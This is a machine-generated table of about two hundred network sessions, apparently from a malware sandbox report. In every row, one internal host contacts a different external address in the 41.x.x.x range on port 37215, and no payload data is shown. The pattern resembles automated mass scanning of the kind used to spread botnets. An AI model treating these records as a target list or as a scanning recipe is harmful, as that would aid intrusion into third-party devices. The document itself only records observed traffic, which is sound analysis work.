                                                                            9918192.168.2.153979841.248.101.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9919192.168.2.155629241.232.232.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9920192.168.2.156000641.209.236.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9921192.168.2.153808841.121.202.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9922192.168.2.154904841.82.118.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9923192.168.2.153384641.23.239.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9924192.168.2.154439041.90.150.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9925192.168.2.153945441.116.0.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9926192.168.2.153404041.52.65.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9927192.168.2.155645041.79.249.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9928192.168.2.154948041.90.64.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9929192.168.2.153351641.56.37.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9930192.168.2.153781241.156.253.19937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9931192.168.2.153408641.101.39.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9932192.168.2.153911841.109.140.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9933192.168.2.155519041.101.247.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9934192.168.2.153957441.180.172.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9935192.168.2.153653641.204.234.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9936192.168.2.154439841.115.204.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9937192.168.2.154981441.92.212.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9938192.168.2.154246641.128.120.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9939192.168.2.155364241.196.198.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9940192.168.2.155406041.150.219.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9941192.168.2.154351641.52.161.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9942192.168.2.154396041.157.25.19937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9943192.168.2.153619241.127.139.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9944192.168.2.153836641.105.66.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9945192.168.2.155855841.29.231.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9946192.168.2.155585041.65.86.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9947192.168.2.154645241.169.0.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9948192.168.2.156072041.173.26.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9949192.168.2.155578241.78.118.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9950192.168.2.155652441.8.195.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9951192.168.2.155035641.1.149.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9952192.168.2.154203641.69.82.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9953192.168.2.155477041.71.169.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9954192.168.2.154135441.158.23.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9955192.168.2.153870441.98.46.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9956192.168.2.155154641.200.46.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9957192.168.2.155638841.162.152.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9958192.168.2.153531841.216.194.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9959192.168.2.155690041.154.88.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9960192.168.2.154408441.218.102.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9961192.168.2.153494841.9.40.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9962192.168.2.155739441.54.70.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9963192.168.2.154733841.193.142.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9964192.168.2.154741641.151.15.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9965192.168.2.155853841.2.213.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9966192.168.2.154290241.56.19.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9967192.168.2.153635641.253.200.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9968192.168.2.155468841.57.231.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9969192.168.2.155220241.68.240.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9970192.168.2.153942041.156.200.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9971192.168.2.154519841.172.85.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9972192.168.2.155906241.35.232.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9973192.168.2.155796241.163.247.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9974192.168.2.154829841.165.45.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9975192.168.2.154051641.159.214.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9976192.168.2.153542041.18.50.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9977192.168.2.154768641.71.60.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9978192.168.2.153868041.156.170.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9979192.168.2.153635841.95.226.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9980192.168.2.154804241.101.243.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9981192.168.2.153771041.76.64.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9982192.168.2.155907641.59.87.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9983192.168.2.153466041.221.38.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9984192.168.2.154760441.127.73.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9985192.168.2.153550041.241.8.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9986192.168.2.153790241.58.57.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9987192.168.2.155554041.141.44.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9988192.168.2.155778841.184.143.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9989192.168.2.154524441.54.70.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9990192.168.2.154477441.177.248.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9991192.168.2.155065241.152.31.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9992192.168.2.155126241.232.33.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9993192.168.2.153304641.205.107.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9994192.168.2.155269641.45.198.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9995192.168.2.155070641.249.213.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9996192.168.2.153953841.229.78.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9997192.168.2.154080641.226.117.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9998192.168.2.156069641.184.137.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9999192.168.2.155291241.234.87.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10000192.168.2.153543641.111.103.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10001192.168.2.153840641.215.172.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10002192.168.2.155630041.148.15.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10003192.168.2.154541441.131.35.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10004192.168.2.153507241.221.157.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10005192.168.2.155957041.58.115.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10006192.168.2.153783241.130.213.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10007192.168.2.155095841.96.243.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10008192.168.2.155053041.15.105.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10009192.168.2.154005241.154.71.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10010192.168.2.155978641.168.129.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10011192.168.2.154543641.138.128.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10012192.168.2.153493641.167.83.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10013192.168.2.155638441.33.118.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10014192.168.2.155034041.213.183.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10015192.168.2.154238041.41.41.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10016192.168.2.155197241.244.109.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10017192.168.2.154380641.35.184.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10018192.168.2.155658041.132.1.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10019192.168.2.154027241.167.106.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10020192.168.2.154423441.68.146.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10021192.168.2.155500641.92.140.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10022192.168.2.154906641.98.191.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10023192.168.2.153777841.255.254.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10024192.168.2.155645641.249.189.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10025192.168.2.154046841.183.193.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10026192.168.2.155145641.30.220.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10027192.168.2.154855441.24.209.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10028192.168.2.154330241.225.186.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10029192.168.2.154698641.124.18.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10030192.168.2.155251841.87.127.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10031192.168.2.154111641.206.217.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10032192.168.2.153503641.198.100.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10033192.168.2.154016041.187.52.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10034192.168.2.153410841.237.83.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10035192.168.2.155594041.34.6.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10036192.168.2.153626841.70.235.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10037192.168.2.155723841.230.12.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10038192.168.2.155887841.43.16.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10039192.168.2.155985441.147.98.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10040192.168.2.155121241.138.87.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10041192.168.2.153876641.169.78.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10042192.168.2.155243041.134.89.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10043192.168.2.154971441.171.123.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10044192.168.2.153767241.173.123.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10045192.168.2.153945441.29.92.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10046192.168.2.154086841.41.85.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10047192.168.2.153367441.71.10.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10048192.168.2.155575641.107.164.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10049192.168.2.154229841.191.211.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10050192.168.2.155265041.116.159.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10051192.168.2.154896041.206.66.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10052192.168.2.154219241.136.154.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10053192.168.2.154357841.154.163.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10054192.168.2.155851241.190.226.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10055192.168.2.153601641.68.118.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10056192.168.2.155959041.229.141.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10057192.168.2.155748641.215.145.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10058192.168.2.153320241.97.189.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10059192.168.2.153392041.175.27.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10060192.168.2.154951241.202.181.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10061192.168.2.154853241.163.131.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10062192.168.2.155572641.238.227.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10063192.168.2.154636041.143.233.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10064192.168.2.153418241.205.233.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10065192.168.2.153840041.249.29.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10066192.168.2.153291441.148.131.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10067192.168.2.154985041.162.125.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10068192.168.2.154990041.61.17.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10069192.168.2.155580841.59.224.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10070192.168.2.155443441.75.147.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10071192.168.2.153280041.212.86.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10072192.168.2.155325841.255.80.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10073192.168.2.154017241.109.144.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10074192.168.2.153811041.63.98.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10075192.168.2.156068041.193.67.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10076192.168.2.154298841.179.193.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10077192.168.2.153507241.180.159.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10078192.168.2.154477841.113.21.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10079192.168.2.154111041.140.64.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10080192.168.2.153704241.149.182.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10081192.168.2.155674041.134.15.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10082192.168.2.153395641.187.6.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10083192.168.2.154617641.56.197.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10084192.168.2.155140841.191.22.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10085192.168.2.153368041.203.203.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10086192.168.2.155631241.52.11.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10087192.168.2.155058641.11.190.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10088192.168.2.154427441.61.60.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10089192.168.2.154520641.108.242.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10090192.168.2.153740041.160.106.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10091192.168.2.156050841.106.28.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10092192.168.2.154234641.196.244.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10093192.168.2.154438041.248.72.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10094192.168.2.155462041.213.69.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10095192.168.2.154911841.41.199.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10096192.168.2.153656241.47.211.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10097192.168.2.153937841.224.80.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10098192.168.2.153940441.36.64.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10099192.168.2.155013841.195.201.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10100192.168.2.153533041.128.239.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10101192.168.2.154995041.89.128.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10102192.168.2.153899641.137.233.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10103192.168.2.153452641.222.95.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10104192.168.2.154330841.64.1.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10105192.168.2.154183241.55.57.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10106192.168.2.154555641.125.249.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10107192.168.2.153872241.251.168.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10108192.168.2.154766641.114.155.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10109192.168.2.155510241.19.34.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10110192.168.2.155426241.219.90.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10111192.168.2.153774841.83.200.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10112192.168.2.155370041.104.70.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10113192.168.2.154180641.37.230.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10114192.168.2.153991041.195.13.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10115192.168.2.155410641.148.127.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10116192.168.2.154775041.205.253.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10117192.168.2.153510041.235.182.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10118192.168.2.156080041.176.210.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10119192.168.2.153916641.247.100.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10120192.168.2.154794041.169.100.17637215
                                                                            TimestampBytes transferredDirectionData


